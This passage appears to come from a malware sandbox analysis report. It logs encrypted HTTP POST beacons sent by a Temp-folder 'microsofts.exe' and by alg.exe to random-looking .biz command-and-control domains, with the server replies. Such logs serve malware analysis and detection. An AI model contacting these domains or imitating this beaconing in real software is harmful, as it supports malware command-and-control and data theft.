                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:01 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=c02b687697ca7ce3f9b15e99970f46d9|8.46.123.33|1728547741|1728547741|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          88192.168.2.55157718.208.156.248807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.664510012 CEST347OUTPOST /do HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.664521933 CEST778OUTData Raw: 9e af a1 88 0d 7e 1e 96 fe 02 00 00 89 2f 95 06 b0 db 74 95 2a d7 d6 5e 20 1e 16 7d 96 93 9b 57 d8 f9 7e ab a4 0e a5 9c b8 b9 54 c5 27 f4 0e 28 13 e5 17 b6 f1 0f a8 71 7f de 02 1c e6 6f ac 88 d5 5c a0 e3 9e 63 d1 e0 5d 6b cd e4 0f 18 3b 95 0f 36
                                                                                                                                                                                                                                                                                                          Data Ascii: ~/t*^ }W~T'(qo\c]k;6{Nhpw*|vB)JssY~S:O9XP9%p;6g<[)<sPjTnML]qW*= ZFRJ-tbL)*d%m>oAT_$Y
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.120738983 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:01 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=c085864dd12caecabdd2942f05d4a5ed|8.46.123.33|1728547741|1728547741|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          89192.168.2.55157844.213.104.86807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.686340094 CEST354OUTPOST /gblimgnlscyku HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: xccjj.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.686352015 CEST778OUTData Raw: dc d7 a4 af 2a 17 a1 c0 fe 02 00 00 f6 87 ae 31 cb fd 2a a6 5c 1e fa f4 60 66 e5 71 a6 78 cd af 60 87 7c 71 48 60 d9 c6 a0 f6 75 cb 9d c3 3e 03 fb 02 32 e0 0f 0c b7 a2 8b 8f e6 bc fa 86 06 41 6b b9 47 ce 80 70 89 05 50 28 92 1b c1 95 d7 2e a3 f1
                                                                                                                                                                                                                                                                                                          Data Ascii: *1*\`fqx`|qH`u>2AkGpP(.`.1n^]'LdS'BN.:y rIh*XjXy->&9chnpRcoW!mb+;(g^tiNRa>]JVuL(4
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.141824961 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:02 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=3b57e13b08ef3882665daa09049b93b6|8.46.123.33|1728547742|1728547742|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          90192.168.2.55157918.208.156.24880576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.862725019 CEST351OUTPOST /ukwrctauwj HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.862761974 CEST828OUTData Raw: 89 71 9b 6b 40 5e e2 b3 30 03 00 00 dd 88 52 ea 35 39 e8 7e fd eb 97 59 58 d4 91 46 ec bc 90 93 21 a5 a1 e6 1e e3 6d bf 21 2b 07 77 0e 11 f8 01 c0 ba 0c 8f 75 dc ad d2 88 19 3a 72 bf fb cd 85 9c 49 eb f4 18 70 b9 55 44 6b 25 be 5e 04 e3 44 c7 93
                                                                                                                                                                                                                                                                                                          Data Ascii: qk@^0R59~YXF!m!+wu:rIpUDk%^DiddepUy}(a(+k-)TftGd1\!`R ijXuIm/=>f|oG>*e[/OOGbGa%LagnT
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.348675013 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:02 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=a1da9e9d460091b1faf805004880ee5a|8.46.123.33|1728547742|1728547742|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          91192.168.2.55158044.221.84.10580576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.382262945 CEST347OUTPOST /bct HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.382291079 CEST828OUTData Raw: 22 48 45 b3 2b a7 f8 67 30 03 00 00 7c dc 49 ed b4 d7 5a f1 53 47 c9 44 06 9b 53 3a e3 04 7e 3a ff f2 67 f8 a8 a4 b7 71 21 ce 9b 50 9b ed 8c 43 e1 f4 be a3 7e c1 b2 76 ad 68 5e ea 81 bb 25 bd 3e b6 48 e0 88 24 21 03 32 4d 38 9d c7 8b db 40 24 2e
                                                                                                                                                                                                                                                                                                          Data Ascii: "HE+g0|IZSGDS:~:gq!PC~vh^%>H$!2M8@$.7MxH~kM*Qpc:nAXd![wGma>} ;(F*nd-:Ok-kK#f}OLGjm%w2yy1m.VQSU$}+It"t4
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.848030090 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:02 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=6516681091f09a25877080d7a2746045|8.46.123.33|1728547742|1728547742|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          92192.168.2.55158118.141.10.10780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.226979017 CEST358OUTPOST /lxrjyksdgpjxna HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.227006912 CEST828OUTData Raw: fd 8e fe b4 31 c9 05 b6 30 03 00 00 38 b0 50 91 ab a4 20 d8 86 c6 9c 9e 2d b2 5a 59 d3 8d ef 5b 02 05 92 b2 f6 89 ae 44 b1 c0 c5 cb a7 9b be e4 da 51 53 2e e0 28 a5 7a 95 65 61 24 a5 96 f3 1b 03 a7 60 b2 91 e3 29 4d 36 1a 56 7a cc 92 1a ad 30 fb
                                                                                                                                                                                                                                                                                                          Data Ascii: 108P -ZY[DQS.(zea$`)M6Vz08##``G%*7n>u3a6p0\||r#PH*bI,xzxaI7S3WU*x@~_fW]qP?9,/Jg
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.563556910 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:04 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=e4105005a31384579ae41c61baee025a|8.46.123.33|1728547744|1728547744|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          93192.168.2.55158244.221.84.105807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.500325918 CEST355OUTPOST /bdsoixvaivc HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.500325918 CEST778OUTData Raw: 44 cf d8 b2 73 b4 13 7d fe 02 00 00 7c f9 f9 d1 7c ce 84 10 e9 64 dc ea dd d3 3f 5f 1e 5f f0 bd ce b8 dc cd 61 3a fd 16 e3 2e 4a f4 b1 1a 22 41 08 bd 52 6f 12 ca 5c 69 84 e5 f3 41 27 ea 36 80 0a 64 fc 7d b2 04 9d 45 14 92 dc 37 1e 22 8f 8f 5b b8
                                                                                                                                                                                                                                                                                                          Data Ascii: Ds}||d?__a:.J"ARo\iA'6d}E7"[^cstt[qM^(DnB*"PNoh^F4###_3aB07,"+g.JJZZ0hV+{hj0]6O}l:u
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.963869095 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:03 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=b729cd4f386ee5a8b2661e98047d10ee|8.46.123.33|1728547743|1728547743|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          94192.168.2.55158344.213.104.8680576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.592341900 CEST345OUTPOST /oxda HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: vyome.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.592361927 CEST828OUTData Raw: 73 f8 e9 c4 9d 86 60 43 30 03 00 00 e7 8e ed 4b 2f e8 34 0a 38 69 15 c0 8e 75 6d 53 09 27 1b 64 13 5b 43 98 0f 94 9f a1 bf ea d3 73 73 c3 5f 2e 23 98 32 77 a5 43 59 ff c7 03 68 b2 e3 10 7e 3b 03 20 ce 6e 2d 0d 8f fb b1 5f ff a4 58 cb 3a 32 88 32
                                                                                                                                                                                                                                                                                                          Data Ascii: s`C0K/48iumS'd[Css_.#2wCYh~; n-_X:22loN6c^JPHsnx!($(zxWj8'hNu[i?,&0@DdItdmy!(VIWc!{)B6_<#"7fA^xe^0&
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.113225937 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:05 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=08878defb719c4967fe18d506fb67aea|8.46.123.33|1728547745|1728547745|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          95192.168.2.55158454.244.188.177807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.630541086 CEST353OUTPOST /docjrpuoliw HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.630645037 CEST778OUTData Raw: e9 6b de 8d 9b 92 f7 d7 fe 02 00 00 25 c7 be 42 85 5d bf 56 67 48 ea 83 62 97 11 db 10 56 7b 07 9a 92 49 99 e9 6b 09 89 af 08 c5 4d 7a 18 24 93 a9 63 02 9b 31 74 5c 14 24 9f cd 93 9b 4a db a4 70 38 55 27 09 78 28 7d b6 fe ff 46 76 9c ed 94 7c 67
                                                                                                                                                                                                                                                                                                          Data Ascii: k%B]VgHbV{IkMz$c1t\$Jp8U'x(}Fv|gmKpwTF~.3sw-!r8@"wmT:E%'8AEU&e|ynM7ZDh XM8qg:HyN[fCH0ra+/Lym18i
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.433844090 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:05 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=b5d9166ebad3852176ca0f626b068b69|8.46.123.33|1728547745|1728547745|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          96192.168.2.55158518.208.156.24880576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.146370888 CEST352OUTPOST /jebhuwdu HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.146370888 CEST828OUTData Raw: 57 ca f7 0e 61 53 a8 5b 30 03 00 00 f0 c3 9b 34 54 70 20 6e 67 00 77 60 e2 1c 53 ee bb 37 43 e7 c2 9b 3a 45 c7 9e 5e 5a ce 80 1a d3 51 9b 78 52 e1 e3 9d 2a aa f0 ca d1 dd 73 51 f9 0c 84 ae f5 19 e5 3d 87 0e 7f e3 39 4e 7b 87 5b 20 24 9d 8b ee ec
                                                                                                                                                                                                                                                                                                          Data Ascii: WaS[04Tp ngw`S7C:E^ZQxR*sQ=9N{[ $qFi>]FeR$}.uQe~+&c:^Z~s,O_3f^y?'Jd,&;H Jb}'prLmJ4_ofCk}ZWGWgt'
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.628190994 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:05 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=b16c653960126ccafa487e142af505ac|8.46.123.33|1728547745|1728547745|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          97192.168.2.55158613.251.16.15080576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.960378885 CEST354OUTPOST /yavxloupuaxr HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.960378885 CEST828OUTData Raw: d8 b5 d1 17 68 3b e2 3c 30 03 00 00 9b 5e b4 58 54 c1 41 10 2a 47 b4 72 88 19 7c f6 ae 0a 04 10 7f 4b ce 03 8c 49 25 03 2b ec 1a 06 64 e6 f2 ea 90 08 96 82 c7 7f 1b 47 1f ab 06 0f d8 24 7b b4 79 dd 8c 0c e0 0d 97 e2 b7 1b 02 f0 2e 20 93 d3 0b 00
                                                                                                                                                                                                                                                                                                          Data Ascii: h;<0^XTA*Gr|KI%+dG${y. JUHwND'DJde*+%&%H>s/KtaS6:tEl_~_!rNvyeZB?#6Qs%xu`x(#<dQ>fV@/
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.357758045 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:07 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=6d1a7a24d76700a8e2554a4fa0dfee19|8.46.123.33|1728547747|1728547747|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          98192.168.2.5515873.254.94.185807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:06.287887096 CEST351OUTPOST /vsxacwvtko HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: uaafd.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:06.287902117 CEST778OUTData Raw: 86 5e d2 f1 d1 6a 22 dd fe 02 00 00 24 a1 ec e4 cb 98 37 cf ec bc 12 00 ac 53 71 b1 34 7e cc e2 12 38 45 ed b0 b7 c3 1e e1 71 1b 6e d0 d8 eb 55 20 e8 9b b4 f1 84 b8 c2 f5 25 66 1f da 4a d3 88 93 7f 29 58 4f 1f ff 65 01 85 28 6b bc c2 7c 3e b0 e2
